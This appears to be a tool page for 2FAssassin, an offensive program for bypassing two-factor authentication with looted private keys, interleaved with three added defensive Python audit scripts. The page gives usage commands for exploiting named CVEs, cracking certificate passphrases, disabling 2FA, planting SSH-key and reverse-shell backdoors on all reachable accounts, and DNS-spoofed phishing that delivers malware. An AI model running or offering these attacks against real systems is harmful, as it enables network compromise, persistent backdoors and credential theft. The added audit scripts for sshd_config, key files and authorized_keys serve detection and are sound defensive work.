2FAssassin – Bypass Two Factor Authentication

October 28, 2017 (updated July 27, 2019)

2FAssassin automates exploitation of the common vulnerabilities that lead to private key leakage.

It can be used to compromise an individual system, or an entire network, using looted private keys. It can also analyze and identify potential private keys in a pool of gathered files, extract critical key information in order to identify and validate the target domain, crack and remove the passphrase, inject arbitrary key-based backdoors into all accessible machines, build multi-chained covert tunnels by leveraging loopholes in vulnerable public key authentication, sign malware with a looted private key and distribute it in bulk automatically, generate a phishing site, and more.

The effectiveness of two-factor authentication depends on how well a user protects "something only the user has".
– The tool looks for OTPs and private keys using various methods.
– Private keys can be extracted from client certificates and cracked to be used for authentication.
– The tool exploits the common vulnerabilities that cause private key leakage.
– It propagates the compromise from a single machine to the entire network via looted private keys.

## Features ##

~/2fassassin# python assassin.py -h

(ASCII art banner: 2FAssassin v2)

usage: assassin.py [-h] [--target TARGET] [--silent] [--scan SCAN]
                   [--check CHECK] [--cert CERT] [--filetype FILETYPE]
                   [--user USER] [--user2 USER2] [--secret SECRET]
                   [--spoof SPOOF] [--gateway GATEWAY] [--mitm MITM]
                   [--host HOST] [--mode MODE] [--auto AUTO] [--post POST]
                   [--db DB] [--key KEY] [--log LOG] [--tunnel TUNNEL]
                   [--chain CHAIN]

Bypass 2FA - SMS, Voice, SSH

optional arguments:
  -h, --help           show this help message and exit
  --target TARGET      IP Address
  --silent             reduce output verbosity
  --scan SCAN          Network enumeration { basic | advanced }
  --check CHECK        Check for vulnerabilities, modules
  --cert CERT          Certificate management
  --filetype FILETYPE  Specify file *.extension
  --user USER          username
  --user2 USER2        username2
  --secret SECRET      password
  --spoof SPOOF        spoof
  --gateway GATEWAY    gateway
  --mitm MITM          mitm
  --host HOST          server ip
  --mode MODE          mode
  --auto AUTO          auto mode for automation
  --post POST          post modules
  --db DB              Manage your trophies.
  --key KEY            keys management
  --log LOG            View logs
  --tunnel TUNNEL      Create ssh tunnel with looted private keys
  --chain CHAIN        The amount of connecting chain

## Example Usage ##

– Network enumeration:
./assassin.py --scan <basic | advanced> --target <ip_address | range>
./assassin.py --scan advanced --target 192.168.0.0/24
./assassin.py --scan basic --target 192.168.2.40

AUTOMATIC MODE
--------------

* Check everything (all the common vulnerabilities) that causes private keys to leak out.
./assassin.py --check auto --mode attack

Network Enumeration
        |
        | Building Target Database
        v
+------------------------------------------------------------------------------+
| SSH-based Attacks                                                            |
| ShellShock                                                                   |
| HeartBleed                                                                   |
| Ceragon FibeAir IP-10 SSH Private Key Exposure                               |
| ExaGrid Known SSH Key and Default Password                                   |
| F5 BIG-IP SSH Private Key Exposure                                           |
| Loadbalancer.org Enterprise VA SSH Private Key                               |
| Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution |
| Quantum DXi V1000 SSH Private Key Exposure                                   |
+------------------------------------------------------------------------------+
        |
        | POST Modules
        v
Keys Extraction
        |
        | Looted Keys
        v
Key-based Authentication

Manual MODE
-----------

* SSH-based Attacks to get private keys
./assassin.py --check ssh --mode attack

* HeartBleed Attacks to get private keys:
./assassin.py --check heartbleed --mode attack

* Ceragon FibeAir IP-10 SSH Private Key Exposure: CVE-2015-0936
./assassin.py --check ceragon --mode attack

* ExaGrid Known SSH Key and Default Password: CVE-2016-1560
./assassin.py --check exagrid --mode attack

* F5 BIG-IP SSH Private Key Exposure: CVE-2012-1493
./assassin.py --check f5 --mode attack

* Loadbalancer.org Enterprise VA SSH Private Key
./assassin.py --check loadbalancer --mode attack

* Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution
./assassin.py --check array --mode attack

* Quantum DXi V1000 SSH Private Key Exposure
./assassin.py --check quantum --mode attack

* Check & disable Two-Factor Authentication
./assassin.py --check config --mode attack
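The `--check config` step above targets the sshd settings that enforce the second factor. As an added example that is not part of 2FAssassin or the original post, the following standard-library Python script audits an sshd_config for exactly those settings, so a defender can spot such an edit after the fact. The two sample configurations inside it are constructed; the directive names (UsePAM, KbdInteractiveAuthentication, ChallengeResponseAuthentication, AuthenticationMethods, Match) are real OpenSSH keywords, while the function names are this example's own.

```python
"""Audit sshd_config for settings that remove the second factor from SSH logins.

Added example, not part of 2FAssassin. Standard library only. It models two sshd rules:
the first value seen for a keyword wins, and a Match block overrides the global value
for the sessions it selects. The sample configurations below are constructed.
"""
import re
from collections import defaultdict


def parse_sshd_config(text: str) -> dict[str, dict[str, str]]:
    """Return {scope: {keyword_lower: first_value}}; scope is 'global' or the Match line."""
    scopes: dict[str, dict[str, str]] = defaultdict(dict)
    scope = "global"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()            # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # both 'Key value' and 'Key=value' occur
        keyword = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "match":
            scope = "Match " + value
            continue
        scopes[scope].setdefault(keyword, value)       # sshd ignores later duplicates
    return dict(scopes)


def audit_two_factor(text: str) -> list[str]:
    """Return one finding per setting that lets a login succeed with a single factor."""
    findings: list[str] = []
    config = parse_sshd_config(text)
    if config.get("global", {}).get("usepam", "no").lower() != "yes":
        findings.append("[global] UsePAM is not 'yes': PAM OTP modules never run")
    for scope, conf in config.items():
        # KbdInteractiveAuthentication is the current name; older sshd used ChallengeResponseAuthentication
        kbd = conf.get("kbdinteractiveauthentication",
                       conf.get("challengeresponseauthentication", "yes"))
        if kbd.lower() == "no":
            findings.append(f"[{scope}] keyboard-interactive disabled: no OTP prompt possible")
        methods = conf.get("authenticationmethods", "any" if scope == "global" else None)
        if methods is None:
            continue                                   # Match block inherits the global requirement
        if methods.lower() == "any":
            findings.append(f"[{scope}] AuthenticationMethods unset: one factor is enough")
            continue
        for chain in methods.split():                  # space-separated alternatives, comma-joined factors
            if len(chain.split(",")) < 2:
                findings.append(f"[{scope}] single-factor chain '{chain}' permitted")
    return findings


WEAK_SSHD_CONFIG = """
# constructed sample: the kind of edit a 'disable 2FA' step leaves behind
UsePAM no
ChallengeResponseAuthentication no
PubkeyAuthentication yes
AuthenticationMethods publickey,keyboard-interactive
Match User svc-deploy
    AuthenticationMethods publickey
"""

HARDENED_SSHD_CONFIG = """
# constructed sample: a public key AND a PAM-driven OTP are both required
UsePAM yes
KbdInteractiveAuthentication yes
PubkeyAuthentication yes
PasswordAuthentication no
AuthenticationMethods publickey,keyboard-interactive
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(name, audit_two_factor(cfg) or ["no findings"])
```

The Match block in the weak sample is the case worth remembering: the global `AuthenticationMethods` line looks correct, yet one account is quietly exempted, so an audit has to evaluate each scope rather than grep for a single line.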

POST MODE
---------

* Once you have looted the private keys, perform key-based authentication to all targets in the database
./assassin.py --check ssh --mode auth

Certificate Handling
--------------------

Certificate handling flow (reconstructed from the original ASCII diagram):
#1  Analyze Certificate (PKCS#12 Certificate)
#2  Getting Passphrase { Cracking | Stealing }
#3  Parsing Cracked Passphrase
#4  Remove Passphrase
#5  Extract Public Key
#6  Extract Private Key (keep for later use)
#7  Validate Domain
#8  Real Domain Hunting
#9  Prepare Client Machine (Loading Client Certificate)
#10 Authenticate to SSL Server (SSL/HTTPS)

* Look for potential certificate files (contains private keys inside!!!)
./assassin.py --cert analyze --filetype pfx

* Cracking PKCS#12 Passphrases:
{Dictionary Attacks -- using wordlist}
./assassin.py --cert crack --mode dic --filetype pfx

{Pure Brute Force + Mutation}
./assassin.py --cert crack --mode bruteforce --filetype pfx

* Dissect the certificate file + remove the passphrases + hunt for the correct domain (target server)
./assassin.py --cert dissect --filetype pfx

* Prepare client machine + install cracked certificate + authenticate to SSL server
./assassin.py --cert windows --user <username> --secret <password> --host <client_machine_ip>
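The `--cert analyze` step searches gathered files for certificate material that still contains private keys. The same inventory is what a defender should run first. The Python script below is added here and is not part of 2FAssassin: it walks a directory, reports every PEM or OpenSSH private key it finds and whether that key is passphrase-protected, and lists PKCS#12 (.pfx/.p12) containers for manual review, since judging their passphrase needs an ASN.1 parser. It uses only the standard library; all sample files are constructed placeholders written to a temporary directory, and the function names are this example's own.

```python
"""Inventory private-key material on disk and report whether each key is passphrase-protected.

Added example, not part of 2FAssassin. PEM and OpenSSH formats are inspected; PKCS#12
containers are only listed. Sample files are constructed and contain no real key material.
"""
import base64
import re
import tempfile
from pathlib import Path

PEM_BLOCK = re.compile(rb"-----BEGIN ([A-Z0-9 ]+)-----\r?\n(.*?)-----END \1-----", re.S)
PRIVATE_LABELS = {
    "PRIVATE KEY", "ENCRYPTED PRIVATE KEY", "RSA PRIVATE KEY",
    "EC PRIVATE KEY", "DSA PRIVATE KEY", "OPENSSH PRIVATE KEY",
}
PKCS12_SUFFIXES = {".pfx", ".p12"}


def openssh_cipher(body: bytes) -> bytes:
    """Cipher name stored in an 'openssh-key-v1' blob; b'none' means the key is stored in clear."""
    blob = base64.b64decode(b"".join(body.split()))
    magic = b"openssh-key-v1\x00"
    if not blob.startswith(magic):
        return b"unknown"
    n = int.from_bytes(blob[len(magic):len(magic) + 4], "big")
    return blob[len(magic) + 4:len(magic) + 4 + n]


def classify_pem(data: bytes) -> list[tuple[str, bool]]:
    """Return (label, encrypted) for every private-key PEM block found in data."""
    results = []
    for m in PEM_BLOCK.finditer(data):
        label, body = m.group(1).decode(), m.group(2)
        if label not in PRIVATE_LABELS:
            continue                                  # certificates, CSRs, public keys are not secrets
        if label == "ENCRYPTED PRIVATE KEY":          # PKCS#8 encrypted form is always protected
            encrypted = True
        elif label == "OPENSSH PRIVATE KEY":
            encrypted = openssh_cipher(body) != b"none"
        else:                                         # legacy PEM announces encryption in a header line
            encrypted = b"Proc-Type: 4,ENCRYPTED" in body
        results.append((label, encrypted))
    return results


def scan_tree(root: Path) -> list[dict]:
    """Walk root and report every file holding private-key material."""
    report = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if path.suffix.lower() in PKCS12_SUFFIXES:
            report.append({"file": path.name, "kind": "PKCS#12 container", "encrypted": None})
            continue
        for label, encrypted in classify_pem(path.read_bytes()):
            report.append({"file": path.name, "kind": label, "encrypted": encrypted})
    return report


def unprotected_keys(report: list[dict]) -> list[str]:
    """Files whose private key can be used without any passphrase."""
    return [r["file"] for r in report if r["encrypted"] is False]


def make_openssh_blob(cipher: bytes) -> bytes:
    """Constructed (not a real key): only the header that openssh_cipher() reads is meaningful."""
    raw = b"openssh-key-v1\x00" + len(cipher).to_bytes(4, "big") + cipher + b"\x00" * 16
    return base64.b64encode(raw)


def build_sample_tree() -> Path:
    """Write constructed sample files into a temporary directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="keyaudit-"))
    (root / "clear.pem").write_bytes(
        b"-----BEGIN RSA PRIVATE KEY-----\nAAAA\n-----END RSA PRIVATE KEY-----\n")
    (root / "protected.pem").write_bytes(
        b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,00\n\n"
        b"AAAA\n-----END RSA PRIVATE KEY-----\n")
    (root / "id_ed25519").write_bytes(
        b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + make_openssh_blob(b"none")
        + b"\n-----END OPENSSH PRIVATE KEY-----\n")
    (root / "server.crt").write_bytes(
        b"-----BEGIN CERTIFICATE-----\nAAAA\n-----END CERTIFICATE-----\n")
    (root / "export.pfx").write_bytes(b"\x30\x82")   # placeholder bytes, not a real PKCS#12 file
    return root


if __name__ == "__main__":
    rep = scan_tree(build_sample_tree())
    for row in rep:
        print(row)
    print("unprotected:", unprotected_keys(rep))
```

Files that appear under `unprotected_keys()` are the ones the tool's certificate workflow needs no cracking step for; moving them to an encrypted form, or off the shared file store entirely, removes the easiest case.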

Client-certificate loading (reconstructed from the original ASCII diagram):
#1 Attacker Machine (2FAssassin) sends the client-certificate and an instruction script to the Windows Client (172.16.173.180)
#2 Windows Client loads the client-certificate
#3 Windows Client authenticates to the remote SSL Website (172.16.173.182)

Backdoor
--------

Backdoor flow (reconstructed from the original ASCII diagram):
#1 create user '2fassassin'
#2 generate RSA keypair (sshkey)
#3 access to remote server
#4 add keys to every accessible account (account_1, account_2, account_3, account_4, account_5, ...)

* Add arbitrary SSH keys to all the accessible accounts
./assassin.py --check sshkey --mode attack

* Drop a persistent backdoor (reverse shell) to all the accessible accounts
./assassin.py --check reverse --mode attack
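Both backdoor modules above leave their trace in the authorized_keys files of the accounts they reach. The Python script below is an added example, not part of 2FAssassin or the original post: it audits such a file against an allowlist of known-good key fingerprints (the SHA256 form that `ssh-keygen -lf` prints, so the allowlist can come from an existing key inventory) and additionally flags entries whose comment carries the "2fassassin" indicator the FAQ mentions. The sample file and the key blobs inside it are constructed and are not usable keys; all function and constant names are this example's own.

```python
"""Audit an authorized_keys file against an allowlist of known-good key fingerprints.

Added example, not part of 2FAssassin. Standard library only. Fingerprints use the
OpenSSH SHA256 form. The sample file and key blobs are constructed, not real keys.
"""
import base64
import hashlib
import shlex
import struct
from dataclasses import dataclass

KEY_TYPES = {
    "ssh-rsa", "ssh-dss", "ssh-ed25519", "sk-ssh-ed25519@openssh.com",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
}
# Comment substring the page associates with the tool's generated keys (assumed indicator).
SUSPICIOUS_COMMENTS = ("2fassassin",)


@dataclass
class KeyEntry:
    line_no: int
    options: str
    key_type: str
    fingerprint: str
    comment: str
    well_formed: bool


def fingerprint(blob: bytes) -> str:
    """OpenSSH SHA256 fingerprint: base64 of the digest without '=' padding."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def parse_authorized_keys(text: str) -> list[KeyEntry]:
    """Parse every non-comment line, keeping quoted options such as command="..." intact."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            tokens = shlex.split(line)
        except ValueError:                            # unbalanced quote: fall back to plain split
            tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            entries.append(KeyEntry(line_no, line, "?", "", "", False))
            continue
        key_type, options, comment = tokens[idx], " ".join(tokens[:idx]), " ".join(tokens[idx + 2:])
        try:
            blob = base64.b64decode(tokens[idx + 1], validate=True)
        except ValueError:
            entries.append(KeyEntry(line_no, options, key_type, "", comment, False))
            continue
        # The wire blob starts with a length-prefixed copy of the key type; the two must agree.
        (n,) = struct.unpack(">I", blob[:4].ljust(4, b"\0"))
        well_formed = blob[4:4 + n] == key_type.encode()
        entries.append(KeyEntry(line_no, options, key_type, fingerprint(blob), comment, well_formed))
    return entries


def audit(text: str, allowlist: set[str]) -> list[tuple[int, str]]:
    """Return (line_no, reason) findings for entries an operator should review."""
    findings = []
    for e in parse_authorized_keys(text):
        if not e.well_formed:
            findings.append((e.line_no, "malformed entry"))
            continue
        if e.fingerprint not in allowlist:
            findings.append((e.line_no, f"{e.key_type} {e.fingerprint} is not in the allowlist"))
        if any(s in e.comment.lower() for s in SUSPICIOUS_COMMENTS):
            findings.append((e.line_no, f"comment '{e.comment}' matches a known indicator"))
    return findings


def make_blob(key_type: str, payload: bytes) -> str:
    """Constructed key blob (not a usable key): the wire format is length-prefixed strings."""
    raw = struct.pack(">I", len(key_type)) + key_type.encode() + struct.pack(">I", len(payload)) + payload
    return base64.b64encode(raw).decode()


KNOWN_KEY = make_blob("ssh-ed25519", b"\x01" * 32)
ROGUE_KEY = make_blob("ssh-rsa", b"\x02" * 64)
SAMPLE_AUTHORIZED_KEYS = f"""# constructed sample file
ssh-ed25519 {KNOWN_KEY} alice@workstation
command="/usr/local/bin/backup.sh",no-pty ssh-ed25519 {KNOWN_KEY} backup-job
ssh-rsa {ROGUE_KEY} 2fassassin@attacker-box
"""
ALLOWLIST = {fingerprint(base64.b64decode(KNOWN_KEY))}

if __name__ == "__main__":
    for line_no, reason in audit(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        print(f"line {line_no}: {reason}")
```

Run against real files with an allowlist built from your own inventory, the fingerprint check is the one that matters; the comment check only catches the default comment the FAQ's `ssh-keygen` step would leave, which an operator can rename freely.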

Impersonation / Client Side Attacks
-----------------------------------

Impersonation flow (reconstructed from the original ASCII diagram):
#1 Server certificate was stolen by the attacker (2FAssassin)
#2 Attacker cracked the server certificate, then used it to set up a Phishing Website (172.16.173.194)
#3 DNS Spoofing against the DNS Server (172.16.173.191)
#4 The SSL website now resolves to 172.16.173.194 (normally the Windows Client at 172.16.173.180 performs client auth to the SSL Website at 172.16.173.182)
#5 Client performs (abnormal) client auth to the phishing website
#6 Client downloads malware from the phishing website
#7 Reverse shell connects back to the attacker

* Set up phishing website + DNS Spoofing Attacks
./assassin.py --filetype pfx --spoof <phishing_server_ip> --user <username> --secret <password> --target <victim_ip> --gateway <dns_ip> --mitm <on|off>

Tunnelling
----------

* Create ssh tunnel using looted private keys (the greater the chain value, the longer the ssh tunnel)
./assassin.py --tunnel ssh --chain 1 --user <username> --secret password --user2 <username> --host <server_ip>
./assassin.py --tunnel ssh --chain 2 --user <username> --secret password --user2 <username2> --host <server_ip> --user3 <username3> --host2 <server_ip2>
./assassin.py --tunnel ssh --chain 3 --user <username> --secret password --user2 <username2> --host <server_ip> --user3 <username3> --host2 <server_ip2> --user4 <username4> --host3 <server_ip3>

Administration
--------------

* View activity output:
./assassin.py --log all

* See what (e.g., credentials) you've got:
./assassin.py --log loot

* Find out the origin of the SSH user:
./assassin.py --log whereis --user <username>

* Find out what SSH accounts are remotely accessible:
./assassin.py --log account --host <target_host>

Investigation
-------------

* Check if a remote host is using key-based authentication
./assassin.py --check pka --mode detect

* Find out which machine is hosting the user account
./assassin.py --log whereis --user <username>

* Find out what accounts can potentially be accessed by a specific user
./assassin.py --log account --host <ip_address>

## FAQ ##

– Error when launching network enumeration
Try loading msgrpc in msfconsole and define the password (e.g., load msgrpc Pass=abc123)

– The user "2fassassin" is not found when running "./assassin.py --check sshkey --mode attack"
Try creating the user manually:
useradd --force-badname 2fassassin
su 2fassassin
cd $HOME
ssh-keygen -t rsa
